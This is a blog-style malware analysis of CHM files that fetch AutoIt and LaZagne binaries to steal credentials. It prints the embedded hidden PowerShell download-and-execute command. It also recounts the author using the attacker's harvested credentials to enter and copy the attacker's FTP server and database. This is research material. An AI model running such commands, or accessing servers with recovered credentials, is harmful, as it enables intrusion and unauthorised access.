Wednesday, 3 February 2016

Reverse CHM and AutoIt to Peek inside Attacker Server

Recently, I found 2 CHM files on VT which were using the LaZagne credential recovery project for stealing credentials from the machine.

The LaZagne project can be found on github here:

MD5 hashes of the CHM files:


Here is a brief analysis of the CHM file with MD5 hash: b291495b1c01c680b697fe74236fb355

1. The CHM file has an HTM file inside it which will download a malicious binary from the URL:, drop it on the filesystem in the path: %appdata%\image.exe and execute it using Powershell.

Below is the relevant code section from the HTM file which performs the Download and Execute function:

<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('','%APPDATA%\image.exe');Start-Process %APPDATA%\image.exe;">

2. The downloaded binary from the above URL has the MD5 hash: 127bf4070c2d4c73c7a4a191daf0606f. This is an AutoIT binary which downloads the LaZagne binary from the URL:, saves it as pass.exe and executes it.

3. Another AutoIT binary called AutoUpdate.exe with MD5 hash: b07c6635a4044f8623595074bcb6fab2 will be dropped on the file system and it will send the credentials harvested using the LaZagne project to a gmail address through

As you can see, the attackers have combined multiple stages into the information stealing process. It can be summarized as:

CHM -> Download the Binary -> Execute using Powershell -> Download LaZagne binary -> Execute it -> Execute Dropped AutoUpdate.exe and send the stolen credentials to the attacker.

Decompiling the AutoIt binary

The AutoIT binary with MD5 hash: b07c6635a4044f8623595074bcb6fab2 which is dropped on the file system will be used for sending the stolen credential information to the attacker's gmail address. To find out the email address, we need to decompile this AutoIT binary.

Now, it is important to note that this binary cannot be decompiled with the available decompilers online.

I tried the following 2 and both of them were unable to decompile:

One of the reasons for this is that the AutoIT binary was compiled using a recent version of AutoIT which is not supported by AutoIT decompilers available online.

To get the decompiled code, I debugged the AutoIT binary and the following method is not documented anywhere yet.

1. The AutoIT binary is UPX packed, so first we unpack it.
2. Now, open this binary with your Debugger and set a breakpoint on WriteFile(). During the execution, it will drop a file in %temp% directory with hex encoded data inside it as shown below:

We can see in the screenshot above that there are markers like "t87!" in between the hex encoded data. If we replace all these markers with "2020" and decode the hex encoded data, we get plaintext data as shown below:

The reason I selected "2020" is because 0x20 is the hex representation of a whitespace character. This helps with readability of the decoded data. In the screenshot above you can see the attacker's gmail address.

gmail address:

Now, with the credentials of attacker's gmail address at hand, the next step is obvious, we have to explore his server :)

Peek inside the Attacker's Server

The site, hosted on this server is spoofing a legitimate banking site of Ukraine called

Spoofed HTML Page:

Attackers registered the site, on 10th Dec 2015.

I got FTP access to this Server and took a backup of all his directories :)

By browsing the directories, I found several different crypted variants of the binaries which are described above. Also, multiple malicious CHM files were found on the server.

Here are the details:


Admin Panel:

IRS Phishing Page:

Attacker's email address:

Pony Admin Panel:

Of course, since we have access to the server side scripts, so it means we have access to his back end MySQL database as well :)